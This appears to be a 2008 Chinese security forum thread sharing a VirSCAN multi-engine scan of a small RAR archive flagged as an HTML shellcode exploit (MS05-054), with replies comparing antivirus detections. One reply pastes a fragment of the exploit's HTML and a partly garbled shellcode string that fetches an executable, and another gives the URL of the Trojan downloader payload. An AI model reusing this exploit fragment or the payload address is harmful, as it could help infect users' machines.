红伞报HTML/Shellcode.Gen

沸沸

VirSCAN.org Scanned Report :
Scanned time   : 2008/02/17 13:35:43 (CST)
Scanner results: 20%的杀软(7/35)报告发现病毒
File Name      : QVod[1].rar
File Size      : 987 byte
File Type      : RAR archive data, v1d, os
MD5            : 7d10b22b511e2eeb94da7e04aec0219f
SHA1           : 5ccf542f2501a3dc96c98f9db4358c5f6946b73a
Online report  : http://virscan.org/report/f0e15ebb67265bffd57cf6af4f902954.html
Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
a-squared      3.0.0.126       2008.02.16        2008-02-16  4.25   -
安博士V3       2008.02.14.10   2008.02.14        2008-02-14  1.12   -
AntiVir        7.6.0.67        7.0.2.148         2008-02-15  3.19   HTML/Shellcode.Gen
Arcavir        1.0.4           200802161224      2008-02-16  3.06   -
AVAST          1.0.8           080216-0          2008-02-16  3.08   -
AVG            7.5.51.442      269.20.7/1283     2008-02-16  2.06   -
BitDefender    7.60825.981540  7.17566           2008-02-17  3.56   Exploit.HTML.Agent.AI (suspected)
CA (VET)       9.0.0.143       31.3.5541         2008-02-16  10.96  JS/MS05-054!exploit trojan.
ClamAV         0.92            5844              2008-02-17  0.01   -
Comodo         2.11            2.0.0.437         2008-02-16  0.88   -
CP Secure      1.1.0.695       2008.02.15        2008-02-15  7.90   Troj.Exploit.HTML.IESlice.cd
Dr.WEB         4.44.0.9170     2008.02.15        2008-02-15  4.62   -
ewido          4.0.0.2         2008.02.16        2008-02-16  2.32   -
F-PROT         4.4.1.52        20080216          2008-02-16  3.08   HTML/IFrameBoF.G (exact)
F-SECURE       5.51.6100       2008.02.14.03     2008-02-14  5.97   -
飞塔           2.81-3.11       8.759             2008-02-17  1.91   -
ViRobot        20080215        2008.02.15        2008-02-15  1.36   -
IKARUS         T3.1.01.15      2008.02.17.70323  2008-02-17  1.42   Exploit.HTML.Agent.AI
江民杀毒       10.00.650       2008.02.16        2008-02-16  2.29   -
卡巴斯基       5.5.10          2008.02.17        2008-02-17  8.98   -
金山毒霸       2007.6.20.249   2008.2.16         2008-02-16  0.77   -
迈克菲         5.2.00          5231              2008-02-15  2.91   -
MKS_VIR        2.01            2008.02.16        2008-02-16  3.61   -
NORMAN         5.91.10         5.90              2008-02-14  12.99  -
熊猫卫士       9.04.03.0001    2008.02.16        2008-02-16  3.07   -
趋势           8.500-1001      5.108.44          2008-02-16  0.04   -
Prevx          V2              20080217          2008-02-17  6.59   -
QuickHeal      9.00            2008.02.16        2008-02-16  2.17   -
瑞星           20.0            20.31.50.00       2008-02-16  1.59   -
SOPHOS         2.70.1          4.26              2008-02-13  9.51   -
赛门铁克       1.3.0.24        20080216.003      2008-02-16  0.20   -
nProtect       2008-02-16.00   1168831           2008-02-16  5.19   Exploit.HTML.Agent.AI
The Hacker     6.2.9           v00222            2008-02-16  2.98   -
VBA32          3.12.6.1        20080215.2132     2008-02-15  2.51   -
VirusBuster    4.3.19:9        9.121.14/11.0     2008-02-17  1.57   -

沸沸

补充：
Microsoft 1.3204 2008.02.16 TrojanDownloader:Win32/Small.gen!Z
Webwasher-Gateway 6.6.2 2008.02.15 Script.Shellcode.Gen

1p1

<object classid="clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF" name="Cuteqqcn" width=100 height=200></object><script>var Cuteqqaddress;Cuteqqaddress = 0x05050505;var shellcode = unescape("\x"+?90" +"\x"+?90" +"隩媢<媡5x鮒" +"媣 ?蒊A?? +"6?(8騮了" +"贎腼;遳鏭媈" +"$輋?K媈? +"??琶urlmon" +".dllC:\U.ex" +"e3纃@0x 婡" +" 媝瓔@?婡" +"4岪|婡<暱嶯" +"扈?

clovedsm

html类病毒诺顿通常采用防火墙定义拦截方法…

tanlimo

毒霸2008.2.16.15 没查到

http://xxx.haoqq1680.com/dod.exe

spaceplane

NOD
Win32/TrojanDownloader.Agent.NVH 木马的变种

xwq3367

看来国内杀软还有待提高啊`!

wangjay1980

dod.exe_ - Trojan-Downloader.Win32.Agent.jew

qigang

就知道是这死东西，嘿嘿！